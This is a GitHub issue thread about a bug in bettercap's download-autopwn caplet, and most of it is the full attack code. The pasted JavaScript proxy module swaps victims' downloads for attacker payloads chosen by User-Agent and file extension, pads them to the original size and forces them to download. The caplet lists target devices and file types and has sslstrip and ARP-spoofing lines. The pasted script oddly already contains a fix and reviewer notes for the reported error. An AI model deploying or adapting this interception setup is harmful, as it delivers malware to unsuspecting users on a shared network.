bettercap / caplets

caplets and proxy modules.

TypeError: Cannot access member 'toLowerCase' of undefined #50

Closed LuckyFishGeek closed 5 years ago

LuckyFishGeek commented 5 years ago

Description of the bug or feature request

Environment Please provide:

Bettercap version you are using ( bettercap -version ). bettercap v2.24.1 (built for linux amd64 with go1.11.6)

OS version and architecture you are using. Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Steps to Reproduce

set downloadautopwn.devices android,windows

set downloadautopwn.useragent.android Android
set downloadautopwn.useragent.windows Windows|WOW64
set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip
set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip

set downloadautopwn.resizepayloads true

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

http.proxy on

20190914_113423

buffermet commented 5 years ago

Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

LuckyFishGeek commented 5 years ago

> Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

thank you for your help

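// Parsed target definitions, keyed by numeric index. Filled in by onLoad()
// and read by onResponse().
var targets = {}

// A single NUL character; onResponse() appends copies of it as padding when
// payload resizing is enabled.
var nullbyte = "\u0000"

// ANSI escape sequences used to colour the log output.
// Written with \x1b (ESC) instead of the legacy octal escape \033: octal
// escapes are rejected in strict-mode code, while \x1b yields the same
// character in every mode.
var green = "\x1b[32m"
var boldRed = "\x1b[1;31m"
var onRed = "\x1b[41m"
var reset = "\x1b[0m"

// Prefix for each log line: newline, two spaces, one red-background cell.
var redLine = "\n  " + onRed + " " + reset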

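/**
 * Load hook of the proxy script: reads the downloadautopwn.* parameters from
 * `env`, stores one entry per configured device in `targets` and logs a
 * summary of what was loaded.
 *
 * Every device listed in downloadautopwn.devices needs both
 * downloadautopwn.useragent.<device> and downloadautopwn.extensions.<device>.
 * Previously an unset extensions key reached `.toLowerCase()` as undefined
 * (the "Cannot access member 'toLowerCase' of undefined" TypeError), and an
 * unset or empty useragent key was stored as-is; onResponse() passes that
 * value to `new RegExp(...)`, which then matches any User-Agent, so the
 * module would no longer be limited to the listed devices. Both cases now
 * stop the load with an error that names the missing parameter, and
 * `targets` is left untouched.
 *
 * @throws {Error} when a required parameter is unset or empty.
 */
function onLoad() {
    // Return a required parameter, or fail with the name of the missing key.
    function requireParam(key) {
        var value = env[key]
        if (value === undefined || value === null || value === "") {
            throw new Error("download-autopwn: required parameter '" + key + "' is not set")
        }
        return value
    }

    var devices = requireParam("downloadautopwn.devices").split(",")
    var parsed = []
    var logStr = ""
    var i

    // Validate the whole configuration before touching `targets`.
    for (i = 0; i < devices.length; i++) {
        parsed.push({
            "device": devices[i],
            "useragent": requireParam("downloadautopwn.useragent." + devices[i]),
            // Extensions are lower-cased here; onResponse() lower-cases the
            // requested extension before comparing.
            "extensions": requireParam("downloadautopwn.extensions." + devices[i]).toLowerCase().split(",")
        })
    }

    for (i = 0; i < parsed.length; i++) {
        targets[i] = parsed[i]
        logStr += "\n  " + green + parsed[i]["device"] + reset +
                  "\n    User-Agent: " + parsed[i]["useragent"] +
                  "\n    Extensions: " + parsed[i]["extensions"] + "\n"
    }
    log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr)
}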

/**
 * Response hook of the proxy script. For each proxied HTTP response it
 * decides whether the request was a download that matches a configured
 * target and, if so, replaces the response body with the local payload file
 * for that target.
 *
 * A response is rewritten only when all of the following hold:
 *   1. the last path segment of the request contains a ".",
 *   2. the request's User-Agent matches a target's `useragent` regexp,
 *   3. the text after the last "." (lower-cased) equals one of that
 *      target's extensions.
 *
 * NOTE(review): regex, logStr, payload, payloadSize, requestedFile,
 * requestedFileSize, sizeDifference and nullbyteString are assigned without
 * `var`, so they are globals that persist between calls.
 * NOTE(review): neither loop stops after a match; if more than one target
 * matches the same request, each match rewrites the response again.
 *
 * @param req  request object supplied by the proxy; Path, Hostname,
 *             Client.IP and GetHeader() are read here.
 * @param res  response object supplied by the proxy; ReadBody(), SetHeader()
 *             and Body are used here.
 */
function onResponse(req, res) {
    // Cheap pre-filter: strip everything up to the last "/" and only continue
    // when what is left contains a "." (i.e. might carry an extension).
    var requestedFileName = req.Path.replace(/.*\//g, "")
    if ( requestedFileName.indexOf(".") != -1 ) {
        var userAgent = req.GetHeader("User-Agent", ""),
            extension
        // Iterate through targets (numeric keys written by onLoad)
        for ( var t = 0; t < Object.keys(targets).length; t++ ) {
            // The configured useragent value is compiled as a regular
            // expression on every response.
            // NOTE(review): if that value is undefined or empty, the pattern
            // matches any User-Agent, so the module is no longer limited to
            // the listed devices.
            regex = new RegExp(targets[t]["useragent"])
            if ( userAgent.match(regex) ) {
                // Iterate through target extensions
                for (var e = 0; e < targets[t]["extensions"].length; e++) {
                    // Compare the text after the last "." of the file name,
                    // lower-cased, with the configured extension.
                    // function endsWith() could be a nice simplification here
                    if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) {
                        extension = targets[t]["extensions"][e]
                        // Build the log entry: client IP, matched extension, requested URL, device
                        logStr = "\n" + redLine + "  Autopwning download request from " + boldRed + req.Client.IP + reset + 
                                 redLine + 
                                 redLine + "  Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + 
                                 redLine + 
                                 redLine + "  Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..."
                        // Load the payload file. The path is built from the device name and
                        // the matched extension, both of which come from the configuration,
                        // not from the request.
                        payload = readFile("/usr/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension)
                        // NOTE(review): .length counts string units; whether that equals the
                        // byte count depends on how readFile/ReadBody represent binary data - confirm.
                        payloadSize = payload.length
                        logStr += redLine + "  The raw size of your payload is " + boldRed + payloadSize + reset + " bytes"
                        // Optional padding: when resizing is enabled and the original body is
                        // longer than the payload, NUL characters are appended until both have
                        // the same length. Only the length is matched; the content still differs
                        // from the original file, so a checksum or signature comparison against
                        // the genuine file does not pass.
                        if ( env["downloadautopwn.resizepayloads"] == "true" ) {
                            // Read the original response body to learn its size
                            requestedFile = res.ReadBody()
                            requestedFileSize = requestedFile.length
                            logStr += redLine + "  The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes"
                            // Append nullbytes if required
                            if (requestedFileSize > payloadSize) {
                                logStr += redLine + "  Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..."
                                sizeDifference = requestedFileSize - payloadSize
                                // Array(n + 1).join(c) yields c repeated n times
                                nullbyteString = Array(sizeDifference + 1).join(nullbyte)
                                payload += nullbyteString
                            }
                        }
                        // Set Content-Disposition header to enforce file download instead of in-browser preview.
                        // NOTE(review): the file name comes from the request path and is placed between
                        // quotes without escaping; a '"' in the path would end the quoted value early.
                        res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"")
                        // Update Content-Length header to the (possibly padded) payload length
                        res.SetHeader("Content-Length", payload.length)
                        logStr += redLine + 
                                  redLine + "  Serving your payload to " + boldRed + req.Client.IP + reset + "...\n"
                        log(logStr)
                        // Replace the response body with the payload
                        res.Body = payload
                    }
                }
            }
        }
    }
}

download-autopwn.zip

buffermet commented 5 years ago

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

LuckyFishGeek commented 5 years ago

> @LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

I will try and submit the results to you. Thank you again for your help.

LuckyFishGeek commented 5 years ago

> @LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

Bettercap has no feedback when I download the test file (exe, zip, pdf...) 20190915_074049 20190915_074101

LuckyFishGeek commented 5 years ago

> @LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

my download-autopwn.cap

`# documentation can be found at https://github.com/bettercap/blob/master/download-autopwn/README.md

this module lets you intercept very specific download requests and replaces the payload with one of your choice

#

in order for a download to get intercepted:

1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value

2. the requested file must match one of the downloadautopwn.extensions.x file extensions

#

you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own)

#

choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/)

(or feel free to add your own)

set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox

choose the regexp value that the victim's User-Agent has to match

(feel free to add your own)

set downloadautopwn.useragent.android Android
set downloadautopwn.useragent.ios iPad|iPhone|iPod
set downloadautopwn.useragent.linux Linux
set downloadautopwn.useragent.macos Intel Mac OS X 10_
set downloadautopwn.useragent.ps4 PlayStation 4
set downloadautopwn.useragent.windows Windows|WOW64
set downloadautopwn.useragent.xbox Xbox

choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../)

(again, you can add as many as you want)

make sure the payload files exist and that they are all named "payload" (for example: payload.exe)

set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip
set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip
set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip
set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip
set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip
set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip
set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip

choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)

set downloadautopwn.resizepayloads true

set download-autopwn.js as proxy script

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

uncomment if you want sslstrip enabled

set http.proxy.sslstrip true

start proxy

http.proxy on

wait for everything to start properly

sleep 1

uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)

arp.spoof on

`

buffermet commented 5 years ago

There is also no indication of any requests getting intercepted. You should first confirm whether you can proxy HTTP traffic to begin with.

buffermet commented 5 years ago

Closing because the issue with the caplet is resolved.